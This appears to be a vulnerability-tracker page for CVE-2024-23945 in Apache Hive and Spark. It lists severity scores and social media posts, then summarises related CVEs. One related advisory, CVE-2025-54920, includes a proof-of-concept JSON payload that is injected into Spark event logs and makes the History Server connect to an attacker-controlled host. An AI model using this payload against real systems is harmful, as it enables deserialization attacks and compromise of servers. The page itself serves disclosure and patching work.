CVE-2024-23945

Published Dec 23, 2024

Last updated 10 months ago

CVSS medium 5.9

Overview

Description
Signing cookies is an application security feature that adds a digital signature to cookie data to verify its authenticity and integrity. The signature helps prevent malicious actors from modifying the cookie value, which can lead to security vulnerabilities and exploitation. Apache Hive’s service component accidentally exposes the signed cookie to the end user when there is a mismatch in signature between the current and expected cookie. Exposing the correct cookie signature can lead to further exploitation. The vulnerable CookieSigner logic was introduced in Apache Hive by HIVE-9710 (1.2.0) and in Apache Spark by SPARK-14987 (2.0.0). The affected components are the following: * org.apache.hive:hive-service * org.apache.spark:spark-hive-thriftserver_2.11 * org.apache.spark:spark-hive-thriftserver_2.12
Source
security@apache.org
NVD status
Analyzed
Products
hive, spark

Risk scores

CVSS 3.1

Type
Secondary
Base score
5.9
Impact score
3.6
Exploitability score
2.2
Vector string
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N
Severity
MEDIUM

Weaknesses

security@apache.org
CWE-209
134c704f-9b21-4f2e-91b3-4a467353bcc0
CWE-209

Social media

Hype score
Not currently trending

  1. Apache Hive の深刻な脆弱性 CVE-2024-23953/29869 が FIX:署名の偽造と過度の資格付与 https://t.co/1fS9PqBg87 Apache Hive の脆弱性が FIX しました。ご利用のチームは、ご注意ください。なお、関連する直近のトピックは、2024/12/24 の「Apache Hive/Spark の脆弱性 CVE-2024-23945 が… https://t.co/Ovi6gtBAJT

    @iototsecnews

    10 Feb 2025

    98 Impressions

    1 Retweet

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  2. Apache Hive/Spark の脆弱性 CVE-2024-23945 が FIX:ただちにアップデートを! https://t.co/nAILJTGOJ9 Apache Hive/Spark の脆弱性が FIX しました。クッキー絡みの欠陥なので、悪用されると甚大な被害に至る可能性があります。ご利用のチームは、ご注意ください。Hadoop… https://t.co/gvTt6DmGM3

    @iototsecnews

    7 Jan 2025

    1 Impression

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  3. Warning: A high-severity vulnerability (CVE-2024-23945) is affecting @ApacheSpark and @ApacheHive, enabling threat actors to forge cookies and bypass authentication mechanisms. #Patch #Patch #Patch https://t.co/B8ceW3vqoA

    @CCBbelgium

    30 Dec 2024

    42 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  4. #Vulnerability #ApacheHive CVE-2024-23945: Serious Vulnerability in Apache Hive and Spark Could Lead to Exploitation https://t.co/hczdWIf8Wr

    @Komodosec

    28 Dec 2024

    45 Impressions

    0 Retweets

    0 Likes

    1 Bookmark

    0 Replies

    0 Quotes

  5. CVE-2024-23945: Serious Vulnerability in Apache Hive and Spark Could Lead to Exploitation https://t.co/HGOygTS6bc

    @Dinosn

    25 Dec 2024

    3376 Impressions

    7 Retweets

    17 Likes

    6 Bookmarks

    0 Replies

    0 Quotes

  6. CVE-2024-23945 Impacts Apache Hive and Spark #CVE-2024-23945 #ApacheSpark #ApacheHive https://t.co/eMzoMlp675

    @pravin_karthik

    25 Dec 2024

    33 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  7. CVE-2024-23945: Apache Hive ve Spark'ta Kritik Güvenlik Açığı https://t.co/ogzmOH3WvM

    @cyberwebeyeos

    25 Dec 2024

    23 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  8. CVE-2024-23945: Serious Vulnerability in Apache Hive and Spark Could Lead to Exploitation Stay informed about the security flaw CVE-2024-23945 in Apache Hive and Apache Spark. Understand the impact and learn how to mitigate the risks. https://t.co/9ruNWvr0xT

    @the_yellow_fall

    25 Dec 2024

    283 Impressions

    1 Retweet

    5 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  9. CVE-2024-23945 Signing cookies is an application security feature that adds a digital signature to cookie data to verify its authenticity and integrity. The signature helps prevent … https://t.co/1wGh2JMLMx

    @CVEnew

    23 Dec 2024

    382 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

Configurations

Related CVEs

  1. This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue. Summary Apache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command execution on the host running the Spark History Server. Details The vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, allowing an attacker to specify arbitrary class names in the event JSON. This behavior permits instantiating unintended classes, such as org.apache.hive.jdbc.HiveConnection, which can perform network calls or other malicious actions during deserialization. The attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability. Proof of Concept: 1. Run Spark with event logging enabled, writing to a writable directory (spark-logs). 2. Inject the following JSON at the beginning of an event log file: { "Event": "org.apache.hive.jdbc.HiveConnection", "uri": "jdbc:hive2://<IP>:<PORT>/", "info": { "hive.metastore.uris": "thrift://<IP>:<PORT>" } } 3. Start the Spark History Server with logs pointing to the modified directory. 4. The Spark History Server initiates a JDBC connection to the attacker’s server, confirming the injection. Impact An attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system.CVE-2025-54920
  2. SQL injection vulnerability in Hive Metastore Server (HMS) when processing delete column statistics requests via the Thrift APIs. The vulnerability is only exploitable by trusted/authorized users/applications that are allowed to call directly the Thrift APIs. In most real-world deployments, HMS is accessible to only a handful of applications (e.g., Hiveserver2) thus the vulnerability is not exploitable. Moreover, the vulnerable code cannot be reached when metastore.try.direct.sql property is set to false. This issue affects Apache Hive: from 4.1.0 before 4.2.0. Users are recommended to upgrade to version 4.2.0, which fixes the issue. Users who cannot upgrade directly are encouraged to set metastore.try.direct.sql property to false if the HMS Thrift APIs are exposed to general public.CVE-2025-62728
  3. This issue affects Apache Spark versions before 3.4.4, 3.5.2 and 4.0.0. Apache Spark versions before 4.0.0, 3.5.2 and 3.4.4 use an insecure default network encryption cipher for RPC communication between nodes. When spark.network.crypto.enabled is set to true (it is set to false by default), but spark.network.crypto.cipher is not explicitly configured, Spark defaults to AES in CTR mode (AES/CTR/NoPadding), which provides encryption without authentication. This vulnerability allows a man-in-the-middle attacker to modify encrypted RPC traffic undetected by flipping bits in ciphertext, potentially compromising heartbeat messages or application data and affecting the integrity of Spark workflows. To mitigate this issue, users should either configure spark.network.crypto.cipher to AES/GCM/NoPadding to enable authenticated encryption or enable SSL encryption by setting spark.ssl.enabled to true, which provides stronger transport security.CVE-2025-55039
  4. It technically possible for a user to upload a file to a conversation despite the file upload functionality being disabled. The file upload functionality can be enabled or disabled for specific use cases through configuration. In case the functionality is disabled for at least one use case, the system nevertheless allows files to be uploaded through direct API requests. During the upload file, interception and allowed file type rules are still applied correctly. If file sharing is generally enabled, this issue is not of concern.CVE-2025-3518
  5. Hive creates a credentials file to a temporary directory in the file system with permissions 644 by default when the file permissions are not set explicitly. Any unauthorized user having access to the directory can read the sensitive information written into this file. Users are recommended to upgrade to version 4.0.1, which fixes this issue.CVE-2024-29869

References

Sources include official advisories and independent security research.